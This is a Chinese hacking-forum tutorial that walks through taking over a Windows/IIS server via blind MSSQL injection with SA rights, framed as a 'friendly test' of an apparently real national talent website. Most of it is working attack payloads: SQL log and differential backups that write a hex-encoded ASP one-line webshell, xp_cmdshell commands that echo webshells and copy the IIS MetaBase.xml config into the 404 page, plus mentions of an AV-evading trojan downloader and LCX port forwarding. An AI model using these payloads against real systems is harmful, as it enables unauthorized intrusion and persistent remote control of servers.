sa权限的教程.

admin

————————————————————————九零后安全技术小组 | 90 Security  Team -- 打造90后网安精英团队  ———————————————————————————————
7 C$ C/ G4 s0 E% k. ?; O( t" T

- ]- s4 L9 w0 p3 X8 ~( d                                                             欢迎高手访问指导，欢迎新手朋友交流学习。

                                                                 
                                                                 
; \- D" s, N2 g; @( G                                                                  论坛： http://www.90team.net/
  B4 B! Z- o" c
0 z. f5 }0 ~3 }% y0 f- M
2 E0 B$ A3 w6 H4 I% k) R5 g7 L. ]
; E. r- _7 U9 Q# A" |' |4 N友情检测国家人才网
, K# s0 E9 T, E, L- q0 [. ~
  _% |+ X6 @0 ^. A# R
% Z3 l2 ~- e! @8 P* ^* M. s内容：MSSQL注入SA权限不显错模式下的入侵
) k* y, Q  Y7 k" j' `; J
. ]+ i+ r$ d: m1 Y6 ~$ R5 t1 }
一般新手扫到不显错的SA（systemadmin）的注入点时，虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了，今天我给大家演示下如何利用。方法很简单大家看操作。

) ?4 X% d0 O( f我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。


  q6 T. z1 m( Q! K. r这里的主机环境：MSSQL+JSP 权限为不显错的SA，支持多行执行 xp_cmdshell存活 服务器处于内网，WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003，IIS，404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm。

思路：
/ F, b* ^0 i1 u- G  M
首先：

8 U  b# j" v9 U: J通过XP_CMDSHELL 执行命令再将执行结果指向IIS的404页面，然后访问WEB站点的一个不存在的目录得到命令执行结果，刺探服务器信息。
8 n1 e. h# X/ R" r3 I. D  ]) A
( @* V0 U4 _! e( c1.日志备份获得Webshell
4 ]2 T1 y& Q2 W" K, p7 ], R
1 U1 P* C% E0 D: s$ ^' u( D6 S/ K2.数据库差异备份获得Webshell

4.直接下载免杀远控木马。

5.直接下载LCX将服务器端口转发出来

# X% c8 O( _) f  H4 M8 Y: ^: L6.通过XP_CMDSHELL 执行命令读取iis配置文件（C:\Windows\system32\inetsrv\MetaBase.xml ）分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。

4 p& R, h$ |; p
8 t3 D- j* H: r3 J: a6 y, o6 V
; ?  q. Q2 J& W在这里我就不浪费大家时间了，我已经测试过  日志备份和 数据库差异备份 都没有成功 我就不演示了。  直接下载免杀木马。。这个也不用演示了。 直接在注入点后写入一个 DOWN 的VBS脚本下载就行了，
) v$ D, G6 Z$ G- M: T$ u9 k( m
, Q' {( a; D9 U9 v( |我直接演示后面一个方法
' y, W/ i" q# c
& y0 J6 R6 S, {1 l' V! Y! b/ M
分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL
/ P- ?5 `! n( l! H8 S

( ]1 G& p/ F7 }7 |/ d: d

◆日志备份：
, y9 a/ i, Q% _& C

, t2 k# Q7 i1 H( t1. 进行初始备份
3 E2 h8 d% b4 X, q% @+ E' g  R; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--

; x8 P/ b& X' p: w& V2. 插入数据
- h9 H* P0 R  E8 S% o. n+ y1 x' ^;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--

0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
( l* U' ]* d% o% c1 F" P* S  
/ X- L7 ~; d9 ^: D3. 备份并获得文件，删除临时表
;Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--
) @3 i6 L; {; f. {

, O' l  l! I. V- }8 L6 }
◆数据库差异备份
; B% C) Z' u: \/ }) y
2 }/ ]0 M% N9 \（1. 进行差异备份准备工作

;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<0x633A5C746573742E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--
2 P: Y" U  ]/ A5 ~. v# ~! k, S2 w# {; z
$ Z% r) w! x$ i上面的 0x633A5C746573742E617370  是 c:\test.asp 路径转换后的16进制编码


( l* h3 T  a8 S- s/ Q( @; y（2. 将数据写入到数据库
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
0 X6 O/ ?( x! i3 b
& h2 Y1 O* }3 v! B& V0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
$ ~; h& r% z% [/ G
& n( `+ V3 S: N( E, K3. 备份数据库并清理临时文件

;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<0x633A5C746573742E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--
7 z1 q; t4 c! l$ u+ V" J6 J
" \: e6 e* z3 h  S+ t0x633A5C746573742E617370  为 c:\test.asp  删除临时文件



, s2 c5 o2 ?8 x" i8 W; z用^转义字符来写ASP(一句话木马)文件的方法:   

1.注入点后执行;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("90"^)^</script^> >c:\mu.asp';--
5 W! s- K2 s/ `; E0 p
6 Z/ |9 o; W+ L+ b/ r3 j' I, m2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp
/ W2 {0 c% o% E& G3 U
/ Q2 q5 a& V4 i7 w+ d) Y) N读取IIS配置信息获取web路径

& R. v$ C8 w8 y2 g6 K     
     注入点后面执行   ;exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--

  X, C- T4 X" b9 `2 D; ~0 b执行命令
     
* B- {7 @6 Y6 b+ ]  `! l     注入点后面执行   ;exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--
& y  J  S7 J! b1 O% v- o# x; W) @8 B






+ p, D6 j( l# d9 a1 Z
- e! k, @0 c- M( }& {, i
+ u3 C. r0 o- D# x$ S" j% o





) D% K, Q% I7 T0 i( Y* Z- O




" C9 z- {2 G2 @4 [- K

, a* Q) D9 h/ v8 a1 W9 a& U$ v  a

' l: I: k( C9 Y' ]8 J
% U  K* N* D/ G! Z8 ^8 p


* c2 x5 i. w6 d' e6 F) d5 }& u
0 B- q! x9 P( Q3 x
; z- R- p  v6 ]3 M
% T; k; H3 w' `



2 M* Q2 s7 ^; g3 P" z" R
% B, |1 o  n. p( `
* L" y9 V8 h$ n7 d" k

% I, G, y2 w; K; ]/ l. `) F, h
% d4 ?' H  l  Y( [$ `* O



$ }0 f$ e$ g! G% E, M, g* i2 j
/ x# B) ?$ u. S3 P9 w1 O- |
0 ?  \+ X% q8 M# \- `% I. Z
/ C1 c6 A  {0 A6 Y
% {% t5 A! U3 _* ]. `# D( \* d( o